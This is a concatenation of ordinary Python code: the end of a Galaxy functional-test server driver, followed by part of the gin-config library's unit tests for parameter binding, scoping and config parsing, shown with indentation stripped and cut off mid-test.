"""Setup a Galaxy server for functional test (if needed).
Configuration options can be specified as attributes on the supplied
```config_object``` (defaults to self).
"""
self._saved_galaxy_config = None
self._configure(config_object)
self._register_and_run_servers(config_object)
def restart(self, config_object=None, handle_config=None):
self.stop_servers()
self._register_and_run_servers(config_object, handle_config=handle_config)
def _register_and_run_servers(self, config_object=None, handle_config=None):
config_object = self._ensure_config_object(config_object)
self.app = None
if self.external_galaxy is None:
if self._saved_galaxy_config is not None:
galaxy_config = self._saved_galaxy_config
else:
tempdir = tempfile.mkdtemp(dir=self.galaxy_test_tmp_dir)
# Configure the database path.
galaxy_db_path = database_files_path(tempdir)
# Allow config object to specify a config dict or a method to produce
# one - other just read the properties above and use the default
# implementation from this file.
galaxy_config = getattr(config_object, "galaxy_config", None)
if callable(galaxy_config):
galaxy_config = galaxy_config()
if galaxy_config is None:
setup_galaxy_config_kwds = dict(
allow_path_paste=getattr(config_object, "allow_path_paste", False),
use_test_file_dir=not self.testing_shed_tools,
default_install_db_merged=True,
default_tool_conf=self.default_tool_conf,
datatypes_conf=self.datatypes_conf_override,
prefer_template_database=getattr(config_object, "prefer_template_database", False),
log_format=self.log_format,
conda_auto_init=getattr(config_object, "conda_auto_init", False),
conda_auto_install=getattr(config_object, "conda_auto_install", False),
use_shared_connection_for_amqp=getattr(config_object, "use_shared_connection_for_amqp", False),
allow_tool_conf_override=self.allow_tool_conf_override,
)
galaxy_config = setup_galaxy_config(galaxy_db_path, **setup_galaxy_config_kwds)
isolate_galaxy_config = getattr(config_object, "isolate_galaxy_config", False)
if isolate_galaxy_config:
galaxy_config["config_dir"] = tempdir
self._saved_galaxy_config = galaxy_config
if galaxy_config is not None:
handle_galaxy_config_kwds = handle_config or getattr(config_object, "handle_galaxy_config_kwds", None)
if handle_galaxy_config_kwds is not None:
handle_galaxy_config_kwds(galaxy_config)
if self.use_uwsgi:
server_wrapper = launch_uwsgi(
galaxy_config,
tempdir=tempdir,
config_object=config_object,
)
elif self.else_use_uvicorn:
server_wrapper = launch_uvicorn(
lambda *args, **kwd: buildapp.app_factory(*args, wsgi_preflight=False, **kwd),
galaxy_config=galaxy_config,
config_object=config_object,
)
self.app = server_wrapper.app
else:
# ---- Build Application --------------------------------------------------
self.app = build_galaxy_app(galaxy_config)
server_wrapper = launch_server(
self.app,
buildapp.app_factory,
galaxy_config,
config_object=config_object,
)
log.info(
f"Functional tests will be run against external Galaxy server {server_wrapper.host}:{server_wrapper.port}"
)
self.server_wrappers.append(server_wrapper)
else:
log.info(f"Functional tests will be run against test managed Galaxy server {self.external_galaxy}")
# Ensure test file directory setup even though galaxy config isn't built.
ensure_test_file_dir_set()
def _ensure_config_object(self, config_object):
if config_object is None:
config_object = self
return config_object
def setup_shed_tools(self, testing_migrated_tools=False, testing_installed_tools=True):
setup_shed_tools_for_test(self.app, self.galaxy_test_tmp_dir, testing_migrated_tools, testing_installed_tools)
def build_tool_tests(self, testing_shed_tools=None, return_test_classes=False):
if self.app is None:
return
if testing_shed_tools is None:
testing_shed_tools = getattr(self, "testing_shed_tools", False)
# We must make sure that functional.test_toolbox is always imported after
# database_contexts.galaxy_content is set (which occurs in this method above).
# If functional.test_toolbox is imported before database_contexts.galaxy_content
# is set, sa_session will be None in all methods that use it.
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
# When testing data managers, do not test toolbox.
test_classes = functional.test_toolbox.build_tests(
app=self.app,
testing_shed_tools=testing_shed_tools,
master_api_key=get_admin_api_key(),
user_api_key=get_user_api_key(),
)
if return_test_classes:
return test_classes
return functional.test_toolbox
def run_tool_test(self, tool_id, index=0, resource_parameters=None, **kwd):
if resource_parameters is None:
resource_parameters = {}
host, port, url = target_url_parts()
galaxy_interactor_kwds = {
"galaxy_url": url,
"master_api_key": get_admin_api_key(),
"api_key": get_user_api_key(),
"keep_outputs_dir": None,
}
galaxy_interactor = GalaxyInteractorApi(**galaxy_interactor_kwds)
verify_tool(
tool_id=tool_id,
test_index=index,
galaxy_interactor=galaxy_interactor,
resource_parameters=resource_parameters,
**kwd,
)
def drive_test(test_driver_class):
"""Instantiate driver class, run, and exit appropriately."""
test_driver = test_driver_class()
sys.exit(test_driver.run())
__all__ = (
"copy_database_template",
"build_logger",
"drive_test",
"FRAMEWORK_UPLOAD_TOOL_CONF",
"FRAMEWORK_SAMPLE_TOOLS_CONF",
"FRAMEWORK_DATATYPES_CONF",
"database_conf",
"get_webapp_global_conf",
"nose_config_and_run",
"setup_galaxy_config",
"TestDriver",
"wait_for_http_server",
)
|
config_test.py | # coding=utf-8
# Copyright 2018 The Gin-Config Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import inspect
import io
import logging
import os
import threading
from absl.testing import absltest
import enum
from gin import config
import six
_EXPECTED_OPERATIVE_CONFIG_STR = """
import gin.testdata.import_test_configurables
# Macros:
# ==============================================================================
pen_names = ['Pablo Neruda', 'Voltaire', 'Snoop Lion']
super/sweet = 'lugduname'
# Parameters for configurable1:
# ==============================================================================
configurable1.kwarg1 = \\
'a super duper extra double very wordy string that is just plain long'
configurable1.kwarg2 = None
configurable1.kwarg3 = @configurable2
# Parameters for configurable2:
# ==============================================================================
configurable2.non_kwarg = 'ferret == domesticated polecat'
# Parameters for ConfigurableClass:
# ==============================================================================
ConfigurableClass.kwarg1 = 'statler'
ConfigurableClass.kwarg2 = 'waldorf'
# Parameters for test/scopes/ConfigurableClass:
# ==============================================================================
test/scopes/ConfigurableClass.kwarg1 = 'statler'
test/scopes/ConfigurableClass.kwarg2 = 'beaker'
# Parameters for ConfigurableSubclass:
# ==============================================================================
ConfigurableSubclass.kwarg1 = 'waldorf'
ConfigurableSubclass.kwarg2 = None
ConfigurableSubclass.kwarg3 = 'ferret'
# Parameters for woolly.sheep.dolly:
# ==============================================================================
woolly.sheep.dolly.kwarg = 0
# Parameters for no_arg_fn:
# ==============================================================================
# None.
# Parameters for var_arg_fn:
# ==============================================================================
var_arg_fn.any_name_is_ok = [%THE_ANSWER, %super/sweet, %pen_names]
var_arg_fn.dict_value = {'success': True}
var_arg_fn.float_value = 2.718
var_arg_fn.non_kwarg2 = \\
{'long': ['nested',
'structure',
('that', 'will', 'span'),
'more',
('than', 1),
'line']}
"""
_EXPECTED_CONFIG_STR = """
import gin.testdata.import_test_configurables
# Macros:
# ==============================================================================
pen_names = ['Pablo Neruda', 'Voltaire', 'Snoop Lion']
super/sweet = 'lugduname'
# Parameters for configurable1:
# ==============================================================================
configurable1.kwarg1 = \\
'a super duper extra double very wordy string that is just plain long'
configurable1.kwarg3 = @configurable2
# Parameters for configurable2:
# ==============================================================================
configurable2.non_kwarg = 'ferret == domesticated polecat'
# Parameters for ConfigurableClass:
# ==============================================================================
ConfigurableClass.kwarg1 = 'statler'
ConfigurableClass.kwarg2 = 'waldorf'
# Parameters for test/scopes/ConfigurableClass:
# ==============================================================================
test/scopes/ConfigurableClass.kwarg2 = 'beaker'
# Parameters for ConfigurableSubclass:
# ==============================================================================
ConfigurableSubclass.kwarg1 = 'waldorf'
ConfigurableSubclass.kwarg3 = 'ferret'
# Parameters for woolly.sheep.dolly:
# ==============================================================================
woolly.sheep.dolly.kwarg = 0
# Parameters for var_arg_fn:
# ==============================================================================
var_arg_fn.any_name_is_ok = [%THE_ANSWER, %super/sweet, %pen_names]
var_arg_fn.dict_value = {'success': True}
var_arg_fn.float_value = 2.718
var_arg_fn.non_kwarg2 = \\
{'long': ['nested',
'structure',
('that', 'will', 'span'),
'more',
('than', 1),
'line']}
"""
@config.configurable('configurable1')
def fn1(non_kwarg, kwarg1=None, kwarg2=None, kwarg3=None):
return non_kwarg, kwarg1, kwarg2, kwarg3
@config.configurable
def configurable2(non_kwarg, kwarg1=None):
return non_kwarg, kwarg1
@config.configurable(whitelist=['whitelisted'])
def whitelisted_configurable(whitelisted=None, other=None):
return whitelisted, other
@config.configurable(blacklist=['blacklisted'])
def blacklisted_configurable(blacklisted=None, other=None):
return blacklisted, other
@config.configurable
def required_args(arg1, arg2, arg3, kwarg1=4, kwarg2=5, kwarg3=6):
return arg1, arg2, arg3, kwarg1, kwarg2, kwarg3
@config.configurable
def required_with_vargs(arg1, arg2, arg3, *args, **kwargs):
return arg1, arg2, arg3, args, kwargs
@config.configurable
def required_with_vkwargs(arg1,
arg2,
arg3,
kwarg1=4,
kwarg2=5,
kwarg3=6,
**kwargs):
return arg1, arg2, arg3, kwarg1, kwarg2, kwarg3, kwargs
@config.configurable
def no_arg_fn():
pass
@config.configurable
def var_arg_fn(non_kwarg1, non_kwarg2, *args, **kwargs):
all_non_kwargs = [non_kwarg1, non_kwarg2] + list(args)
return all_non_kwargs + [kwargs[key] for key in sorted(kwargs)]
@config.configurable('dolly', module='__main__')
def clone0(kwarg=None):
return kwarg
@config.configurable('dolly', module='a.furry.sheep')
def clone1(kwarg=None):
return kwarg
@config.configurable('dolly', module='a.woolly.sheep')
def clone2(kwarg=None):
return kwarg
@config.configurable('a.fuzzy.sheep.dolly')
def clone3(kwarg=None):
return kwarg
@config.configurable('sheep.dolly', module='a.hairy')
def clone4(kwarg=None):
return kwarg
@config.configurable
def new_object():
return object()
@config.configurable
def required_as_kwarg_default(positional_arg, required_kwarg=config.REQUIRED):
return positional_arg, required_kwarg
@config.configurable
class ConfigurableClass(object):
"""A configurable class."""
def __init__(self, kwarg1=None, kwarg2=None):
self.kwarg1 = kwarg1
self.kwarg2 = kwarg2
@config.configurable
class ConfigurableSubclass(ConfigurableClass):
"""A subclass of a configurable class."""
def __init__(self, kwarg1=None, kwarg2=None, kwarg3=None):
super(ConfigurableSubclass, self).__init__(kwarg1, kwarg2)
self.kwarg3 = kwarg3
NamedTuple = collections.namedtuple('ConfigurableNamedTuple',
['field1', 'field2'])
@config.configurable
class ConfigurableNamedTuple(NamedTuple):
pass
configurable_external_named_tuple = config.external_configurable(
NamedTuple, 'ExternalConfigurableNamedTuple')
@config.configurable
class ObjectSubclassWithoutInit(object):
"""A class that subclasses object but doesn't define its own __init__.
While there's nothing to configure in this class, it may still be desirable to
instantiate such a class from within Gin and bind it to something else.
"""
@config.configurable(module='ObjectSubclassWithoutInit')
def method(self, arg1='default'):
return arg1
class ExternalClass(object):
"""A class we'll pretend was defined somewhere else."""
__module__ = 'timbuktu'
def __init__(self, kwarg1=None, kwarg2=None):
self.kwarg1 = kwarg1
self.kwarg2 = kwarg2
configurable_external_class = config.external_configurable(
ExternalClass, 'ExternalConfigurable')
config.external_configurable(ExternalClass, 'module.ExternalConfigurable2')
@config.configurable
class ConfigurableExternalSubclass(configurable_external_class):
"""Subclassing an external configurable object.
This is a configurable subclass (of the configurable subclass implicitly
created by external_configurable) of the ExternalClass class.
"""
def __init__(self, kwarg1=None, kwarg2=None, kwarg3=None):
super(ConfigurableExternalSubclass, self).__init__(
kwarg1=kwarg1, kwarg2=kwarg2)
self.kwarg3 = kwarg3
class AbstractConfigurable(object):
__metaclass__ = abc.ABCMeta
def __init__(self, kwarg1=None):
self.kwarg1 = kwarg1
@abc.abstractmethod
def implement_me(self):
pass
@config.configurable
class AbstractConfigurableSubclass(AbstractConfigurable):
def __init__(self, kwarg1=None, kwarg2=None):
super(AbstractConfigurableSubclass, self).__init__(kwarg1=kwarg1)
self.kwarg2 = kwarg2
@config.configurable
def implement_me(self, method_arg='arglebargle'):
return method_arg
class ExternalAbstractConfigurableSubclass(AbstractConfigurable):
def implement_me(self):
pass
config.external_configurable(ExternalAbstractConfigurableSubclass)
class ConfigTest(absltest.TestCase):
def tearDown(self):
config.clear_config(clear_constants=True)
super(ConfigTest, self).tearDown()
def testConfigurable(self):
config.bind_parameter('configurable1.kwarg1', 'value1')
config.bind_parameter('configurable1.kwarg2', 'value2')
self.assertEqual(fn1('value0'), ('value0', 'value1', 'value2', None))
def testInvalidNameOrModule(self):
with six.assertRaisesRegex(self, ValueError, 'invalid.$'):
config.configurable('0ops')(lambda _: None)
with six.assertRaisesRegex(self, ValueError, 'invalid.$'):
config.configurable('')(lambda _: None)
with six.assertRaisesRegex(self, ValueError, 'Module .* invalid'):
config.configurable('ok', module='not.0k')(lambda _: None)
with six.assertRaisesRegex(self, ValueError, 'Module .* invalid'):
config.configurable('fine', module='')(lambda _: None)
def testParseConfigFromFilelike(self):
config_str = u"""
configurable1.kwarg1 = 'stringval'
configurable1.kwarg2 = 0
configurable1.kwarg3 = [0, 1, 'hello']
"""
string_io = io.StringIO(config_str)
config.parse_config(string_io)
self.assertEqual(fn1('value0'), ('value0', 'stringval', 0, [0, 1, 'hello']))
def testParseConfigFromSingleString(self):
config_str = """
configurable1.kwarg1 = 'stringval'
configurable1.kwarg2 = 0
configurable1.kwarg3 = [0, 1, 'hello']
"""
config.parse_config(config_str)
self.assertEqual(fn1('value0'), ('value0', 'stringval', 0, [0, 1, 'hello']))
def testParseConfigFromList(self):
config_str = [
'configurable1.kwarg1 = "stringval"', 'configurable1.kwarg2 = 0',
'configurable1.kwarg3 = [0, 1, "hello"]'
]
config.parse_config(config_str)
self.assertEqual(fn1('value0'), ('value0', 'stringval', 0, [0, 1, 'hello']))
def testParseConfigImportsAndIncludes(self):
config_str = """
import gin.testdata.import_test_configurables
include '{}gin/testdata/my_other_func.gin'
identity.param = 'success'
ConfigurableClass.kwarg1 = @identity()
ConfigurableClass.kwarg2 = @my_other_func()
"""
config.parse_config(config_str.format(absltest.get_default_test_srcdir()))
self.assertEqual(ConfigurableClass().kwarg1, 'success')
self.assertEqual(ConfigurableClass().kwarg2, (-2.9, 9.3, 'Oh, Dear.'))
with six.assertRaisesRegex(self, ImportError, 'No module'):
config.parse_config('import nonexistent.module')
with self.assertRaises(IOError):
config.parse_config("include 'nonexistent/file'")
def testInvalidIncludeError(self):
config_file = '{}gin/testdata/invalid_include.gin'
path_prefix = absltest.get_default_test_srcdir()
err_msg_regex = ('Unable to open file: not/a/valid/file.gin. '
'Searched config paths:')
with six.assertRaisesRegex(self, IOError, err_msg_regex):
config.parse_config_file(config_file.format(path_prefix))
def testExplicitParametersOverrideGin(self):
config_str = """
configurable1.non_kwarg = 'non_kwarg'
configurable1.kwarg1 = 'kwarg1'
configurable1.kwarg3 = 'kwarg3'
"""
config.parse_config(config_str)
# pylint: disable=no-value-for-parameter
non_kwarg, kwarg1, kwarg2, kwarg3 = fn1(kwarg1='ahoy', kwarg3='matey!')
# pylint: enable=no-value-for-parameter
self.assertEqual(non_kwarg, 'non_kwarg')
self.assertEqual(kwarg1, 'ahoy')
self.assertEqual(kwarg2, None)
self.assertEqual(kwarg3, 'matey!')
def testUnknownReference(self):
config_str = """
ConfigurableClass.kwarg1 = 'okie dokie'
unknown.kwarg1 = 'kwarg1'
"""
expected_err_msg = ("No configurable matching 'unknown'.\n"
" In bindings string line 3")
with six.assertRaisesRegex(self, ValueError, expected_err_msg):
config.parse_config(config_str)
def testSkipUnknown(self):
config_str = """
ConfigurableClass.kwarg1 = 'okie dokie'
unknown.kwarg1 = 'kwarg1'
"""
with self.assertRaises(ValueError):
config.parse_config(config_str)
expected_err_msg = "No configurable matching 'unknown'"
with six.assertRaisesRegex(self, ValueError, expected_err_msg):
config.parse_config(config_str, skip_unknown=['moose'])
config.parse_config(config_str, skip_unknown=['unknown'])
config.parse_config(config_str, skip_unknown=True)
self.assertEqual(ConfigurableClass().kwarg1, 'okie dokie')
def testSkipUnknownImports(self):
config_str = """
import not.a.real.module
"""
with self.assertRaises(ImportError):
config.parse_config(config_str)
with absltest.mock.patch.object(logging, 'info') as mock_log:
config.parse_config(config_str, skip_unknown=True)
found_log = False
for log in mock_log.call_args_list:
log = log[0][0] % tuple(log[0][1:])
if 'not.a.real.module' in log:
if 'Traceback' in log:
self.fail('Traceback included for non-nested unknown import log.')
else:
found_log = True
break
self.assertTrue(
found_log, msg='Did not log import error.')
def testSkipUnknownNestedImport(self):
config_str = """
import gin.testdata.invalid_import
"""
with self.assertRaises(ImportError):
config.parse_config(config_str)
with absltest.mock.patch.object(logging, 'info') as mock_log:
config.parse_config(config_str, skip_unknown=True)
found_log = False
for args, _ in mock_log.call_args_list:
log = args[0] % tuple(args[1:])
if 'gin.testdata.invalid_import' in log and 'Traceback' in log:
found_log = True
break
self.assertTrue(
found_log, msg='Did not log traceback of nested import error.')
def testSkipUnknownReference(self):
config_str = """
ConfigurableClass.kwarg1 = [1, @UnknownReference()]
ConfigurableClass.kwarg2 = 12345
configurable2.kwarg1 = 'bog snorkelling'
unknown.kwarg1 = @UnknownReference
"""
expected_err_msg = (
r"No configurable matching reference '@UnknownReference\(\)'")
with six.assertRaisesRegex(self, ValueError, expected_err_msg):
config.parse_config(config_str)
with six.assertRaisesRegex(self, ValueError, expected_err_msg):
config.parse_config(config_str, skip_unknown=['moose'])
config.parse_config(
config_str, skip_unknown=['UnknownReference', 'unknown'])
_, kwarg1_val = configurable2(None)
self.assertEqual(kwarg1_val, 'bog snorkelling')
config.parse_config(config_str, skip_unknown=True)
_, kwarg1_val = configurable2(None)
self.assertEqual(kwarg1_val, 'bog snorkelling')
with six.assertRaisesRegex(self, ValueError, expected_err_msg):
ConfigurableClass()
addl_msg = ".* In binding for 'ConfigurableClass.kwarg1'"
with six.assertRaisesRegex(self, ValueError, expected_err_msg + addl_msg):
config.finalize()
config.bind_parameter('ConfigurableClass.kwarg1', 'valid')
instance = ConfigurableClass()
config.finalize()
self.assertEqual(instance.kwarg1, 'valid')
self.assertEqual(instance.kwarg2, 12345)
def testParameterValidation(self):
config.parse_config('var_arg_fn.anything_is_fine = 0')
err_regexp = ".* doesn't have a parameter.*\n In bindings string line 1"
with six.assertRaisesRegex(self, ValueError, err_regexp):
config.parse_config('configurable2.not_a_parameter = 0')
with six.assertRaisesRegex(self, ValueError, err_regexp):
config.parse_config('ConfigurableClass.not_a_parameter = 0')
config.external_configurable(lambda arg: arg, 'lamdba1', blacklist=['arg'])
config.external_configurable(lambda arg: arg, 'lambda2', whitelist=['arg'])
err_regexp = '.* not a parameter of'
with six.assertRaisesRegex(self, ValueError, err_regexp):
config.external_configurable(
lambda arg: arg, 'lambda3', blacklist=['nonexistent'])
with six.assertRaisesRegex(self, ValueError, err_regexp):
config.external_configurable(
lambda arg: arg, 'lambda4', whitelist=['nonexistent'])
def testMissingPositionalParameter(self):
config.parse_config("""
required_args.arg2 = None
required_args.kwarg2 = None
""")
err_regexp = (r".*\n No values supplied .*: \['arg3'\]\n"
r" Gin had values bound for: \['arg2', 'kwarg2'\]\n"
r" Caller supplied values for: \['arg1', 'kwarg1'\]")
with six.assertRaisesRegex(self, TypeError, err_regexp):
required_args(None, kwarg1=None) # pylint: disable=no-value-for-parameter
def testMissingPositionalParameterVarargs(self):
config.parse_config("""
required_with_vargs.arg2 = None
required_with_vargs.kwarg2 = None
""")
err_regexp = (r".*\n No values supplied .*: \['arg3'\]\n"
r" Gin had values bound for: \['arg2', 'kwarg2'\]\n"
r" Caller supplied values for: \['arg1', 'kwarg1'\]")
with six.assertRaisesRegex(self, TypeError, err_regexp):
# pylint: disable=no-value-for-parameter
required_with_vargs(None, kwarg1=None)
def testSubclassParametersOverrideSuperclass(self):
config_str = """
ConfigurableClass.kwarg1 = 'base_kwarg1'
ConfigurableClass.kwarg2 = 'base_kwarg2'
ConfigurableSubclass.kwarg1 = 'sub_kwarg1'
ConfigurableSubclass.kwarg2 = 'sub_kwarg2'
ConfigurableSubclass.kwarg3 = 'sub_kwarg3'
"""
config.parse_config(config_str)
base = ConfigurableClass()
self.assertEqual(base.kwarg1, 'base_kwarg1')
self.assertEqual(base.kwarg2, 'base_kwarg2')
sub = ConfigurableSubclass()
self.assertEqual(sub.kwarg1, 'sub_kwarg1')
self.assertEqual(sub.kwarg2, 'sub_kwarg2')
self.assertEqual(sub.kwarg3, 'sub_kwarg3')
def testPositionalArgumentsOverrideConfig(self):
config_str = """
configurable2.non_kwarg = 'non_kwarg'
"""
config.parse_config(config_str)
# Our Gin config works.
non_kwarg, _ = configurable2() # pylint: disable=no-value-for-parameter
self.assertEqual(non_kwarg, 'non_kwarg')
# Gin gets overridden by an explicitly supplied positional argument.
non_kwarg, _ = configurable2('overridden')
self.assertEqual(non_kwarg, 'overridden')
# But we haven't broken a legitimate error.
with self.assertRaises(TypeError):
# pylint: disable=redundant-keyword-arg
configurable2('positional', non_kwarg='duplicate')
# pylint: enable=redundant-keyword-arg
def testParseConfigurableReferences(self):
config_str = """
configurable1.kwarg1 = 'stringval'
configurable1.kwarg2 = @scoped/configurable2()
configurable1.kwarg3 = @configurable2
scoped/configurable2.non_kwarg = 'wombat'
configurable2.kwarg1 = {'success': True}
"""
config.parse_config(config_str)
value0, value1, value2, value3 = fn1('value0')
self.assertEqual((value0, value1), ('value0', 'stringval'))
self.assertEqual(value2, ('wombat', {'success': True}))
self.assertTrue(callable(value3))
self.assertEqual(value3('muppeteer'), ('muppeteer', {'success': True}))
def testConfigurableClass(self):
config_str = """
ConfigurableClass.kwarg1 = 'statler'
ConfigurableClass.kwarg2 = 'waldorf'
"""
config.parse_config(config_str)
instance = ConfigurableClass()
self.assertEqual(instance.kwarg1, 'statler')
self.assertEqual(instance.kwarg2, 'waldorf')
def testConfigurableReferenceClassIdentityIsPreserved(self):
config_str = """
ConfigurableClass.kwarg1 = 'hi'
configurable2.non_kwarg = @ConfigurableClass
configurable2.kwarg1 = @ConfigurableClass()
"""
config.parse_config(config_str)
# pylint: disable=no-value-for-parameter
reference, instance = configurable2()
# pylint: enable=no-value-for-parameter
self.assertTrue(inspect.isclass(reference))
self.assertTrue(issubclass(reference, ConfigurableClass))
self.assertIsInstance(instance, ConfigurableClass)
def testConfigurableSubclass(self):
config_str = """
configurable2.non_kwarg = @ConfigurableSubclass
configurable2.kwarg1 = @ConfigurableClass
ConfigurableClass.kwarg1 = 'one'
ConfigurableSubclass.kwarg1 = 'some'
ConfigurableSubclass.kwarg3 = 'thing'
"""
config.parse_config(config_str)
# pylint: disable=no-value-for-parameter
sub_cls_ref, super_cls_ref = configurable2()
# pylint: enable=no-value-for-parameter
self.assertTrue(inspect.isclass(super_cls_ref))
self.assertTrue(inspect.isclass(sub_cls_ref))
sub_instance = sub_cls_ref()
super_instance = super_cls_ref()
self.assertTrue(issubclass(sub_cls_ref, ConfigurableClass))
self.assertIsInstance(sub_instance, ConfigurableClass)
# Because references always wrap the original class via subclassing, other
# subclasses of the original class are not subclasses of the reference.
self.assertFalse(issubclass(sub_cls_ref, super_cls_ref))
self.assertNotIsInstance(sub_instance, super_cls_ref)
self.assertNotIsInstance(sub_instance, type(super_instance))
self.assertEqual(super_instance.kwarg1, 'one')
self.assertEqual(super_instance.kwarg2, None)
self.assertEqual(sub_instance.kwarg1, 'some')
self.assertEqual(sub_instance.kwarg2, None)
self.assertEqual(sub_instance.kwarg3, 'thing')
def testConfigurableMethod(self):
config_str = """
configurable2.non_kwarg = @scoped/AbstractConfigurableSubclass()
implement_me.method_arg = 'bananaphone'
"""
config.parse_config(config_str)
instance, _ = configurable2() # pylint: disable=no-value-for-parameter
self.assertEqual(instance.implement_me(), 'bananaphone')
def testExternalConfigurableClass(self):
config_str = """
ConfigurableClass.kwarg1 = @ExternalConfigurable
ConfigurableClass.kwarg2 = @module.ExternalConfigurable2
ExternalConfigurable.kwarg1 = 'statler'
ExternalConfigurable.kwarg2 = 'waldorf'
"""
config.parse_config(config_str)
configurable_class = ConfigurableClass()
cls = configurable_class.kwarg1
self.assertTrue(issubclass(cls, ExternalClass))
self.assertEqual(cls.__module__, ExternalClass.__module__)
self.assertEqual(cls.__name__, ExternalClass.__name__)
self.assertEqual(cls.__doc__, ExternalClass.__doc__)
self.assertTrue(issubclass(configurable_class.kwarg2, ExternalClass))
instance = cls()
self.assertIsInstance(instance, ExternalClass)
self.assertEqual(instance.kwarg1, 'statler')
self.assertEqual(instance.kwarg2, 'waldorf')
def testAbstractExternalConfigurableClass(self):
config_str = """
configurable2.non_kwarg = @ExternalAbstractConfigurableSubclass()
configurable2.kwarg1 = @ConfigurableClass()
ExternalAbstractConfigurableSubclass.kwarg1 = 'fish'
"""
config.parse_config(config_str)
# pylint: disable=no-value-for-parameter
instance, not_instance = configurable2()
# pylint: enable=no-value-for-parameter
self.assertIsInstance(instance, AbstractConfigurable)
self.assertNotIsInstance(not_instance, AbstractConfigurable)
def testImplicitlyScopedConfigurableClass(self):
config_str = """
configurable2.non_kwarg = @scope1/ConfigurableClass
configurable2.kwarg1 = @scope2/ConfigurableClass
scope1/ConfigurableClass.kwarg1 = 'scope1arg1'
scope1/ConfigurableClass.kwarg2 = 'scope1arg2'
scope2/ConfigurableClass.kwarg1 = 'scope2arg1'
scope2/ConfigurableClass.kwarg2 = 'scope2arg2'
"""
config.parse_config(config_str)
# pylint: disable=no-value-for-parameter
scope1_cls, scope2_cls = configurable2()
# pylint: enable=no-value-for-parameter
self.assertEqual(scope1_cls.__module__, ConfigurableClass.__module__)
self.assertEqual(scope1_cls.__name__, ConfigurableClass.__name__)
self.assertEqual(scope1_cls.__doc__, ConfigurableClass.__doc__)
scope1_instance = scope1_cls()
scope2_instance = scope2_cls()
self.assertEqual(scope1_instance.kwarg1, 'scope1arg1')
self.assertEqual(scope1_instance.kwarg2, 'scope1arg2')
self.assertEqual(scope2_instance.kwarg1, 'scope2arg1')
self.assertEqual(scope2_instance.kwarg2, 'scope2arg2')
def testImplicitlyScopedExternalConfigurableAndSubclass(self):
config_str = """
configurable2.non_kwarg = @scope1/ExternalConfigurable
configurable2.kwarg1 = @scope2/ConfigurableExternalSubclass
scope1/ExternalConfigurable.kwarg1 = 'one'
scope2/ConfigurableExternalSubclass.kwarg2 = 'two'
scope2/ConfigurableExternalSubclass.kwarg3 = 'three'
"""
config.parse_config(config_str)
# pylint: disable=no-value-for-parameter
super_cls, sub_cls = configurable2()
# pylint: enable=no-value-for-parameter
self.assertTrue(issubclass(super_cls, ExternalClass))
self.assertTrue(issubclass(sub_cls, ExternalClass))
self.assertTrue(issubclass(sub_cls, ConfigurableExternalSubclass))
super_instance, sub_instance = super_cls(), sub_cls()
self.assertIsInstance(super_instance, ExternalClass)
self.assertIsInstance(sub_instance, ConfigurableExternalSubclass)
self.assertIsInstance(sub_instance, ExternalClass)
self.assertEqual(super_instance.kwarg1, 'one')
self.assertEqual(super_instance.kwarg2, None)
self.assertEqual(sub_instance.kwarg1, None)
self.assertEqual(sub_instance.kwarg2, 'two')
self.assertEqual(sub_instance.kwarg3, 'three')
def testAbstractConfigurableSubclass(self):
config_str = """
configurable2.non_kwarg = @scoped/AbstractConfigurableSubclass()
scoped/AbstractConfigurableSubclass.kwarg1 = 'kwarg1'
scoped/AbstractConfigurableSubclass.kwarg2 = 'kwarg2'
"""
config.parse_config(config_str)
with config.config_scope('scoped'):
instance = AbstractConfigurableSubclass()
self.assertEqual(instance.kwarg1, 'kwarg1')
self.assertEqual(instance.kwarg2, 'kwarg2')
self.assertEqual(instance.implement_me(method_arg='gouda'), 'gouda')
# Also try when creating from a configurable reference.
instance, _ = configurable2() # pylint: disable=no-value-for-parameter
self.assertEqual(instance.kwarg1, 'kwarg1')
self.assertEqual(instance.kwarg2, 'kwarg2')
self.assertEqual(instance.implement_me(method_arg='havarti'), 'havarti')
def testConfigurableObjectSubclassWithoutInit(self):
config_str = """
ConfigurableClass.kwarg1 = @ObjectSubclassWithoutInit()
ObjectSubclassWithoutInit.method.arg1 = 'valuesaurus'
"""
config.parse_config(config_str)
subclass_instance = ConfigurableClass().kwarg1
self.assertIsInstance(subclass_instance, ObjectSubclassWithoutInit)
self.assertEqual(subclass_instance.method(), 'valuesaurus')
def testExternalConfigurableMethodWrapper(self):
obj_maker = config.external_configurable(object.__call__, 'obj_call')
self.assertIsInstance(obj_maker(), object)
def testExternalConfigurableBuiltin(self):
wrapped_sum = config.external_configurable(sum)
self.assertEqual(wrapped_sum([1, 2, 3]), 6)
def testConfigurableNamedTuple(self):
config_str = """
ConfigurableNamedTuple.field1 = 'field1'
ConfigurableNamedTuple.field2 = 'field2'
ExternalConfigurableNamedTuple.field1 = 'external_field1'
ExternalConfigurableNamedTuple.field2 = 'external_field2'
"""
config.parse_config(config_str)
configurable_named_tuple = ConfigurableNamedTuple()
self.assertEqual(configurable_named_tuple.field1, 'field1')
self.assertEqual(configurable_named_tuple.field2, 'field2')
configurable_named_tuple = configurable_external_named_tuple()
self.assertEqual(configurable_named_tuple.field1, 'external_field1')
self.assertEqual(configurable_named_tuple.field2, 'external_field2')
def testFailedFunctionCall(self):
def some_fn(only_one_arg=None):
del only_one_arg
@config.configurable('broken_function')
def borked_fn(arg): # pylint: disable=unused-variable
some_fn(nonexistent_arg=arg) # pylint: disable=unexpected-keyword-arg
config.parse_config([
'configurable2.non_kwarg = @broken_function()',
'ConfigurableClass.kwarg1 = @scoped/broken_function()',
'broken_function.arg = "mulberries"'
])
expected_msg_regexp = r"'broken_function' \(<function .*borked_fn.*\)$"
with six.assertRaisesRegex(self, TypeError, expected_msg_regexp):
configurable2() # pylint: disable=no-value-for-parameter
expected_msg_regexp = r"'broken_function' \(<.*\) in scope 'scoped'$"
with six.assertRaisesRegex(self, TypeError, expected_msg_regexp):
ConfigurableClass() # pylint: disable=no-value-for-parameter
def testOperativeConfigStr(self):
config_str = """
import gin.testdata.import_test_configurables
configurable1.kwarg1 = \\
'a super duper extra double very wordy string that is just plain long'
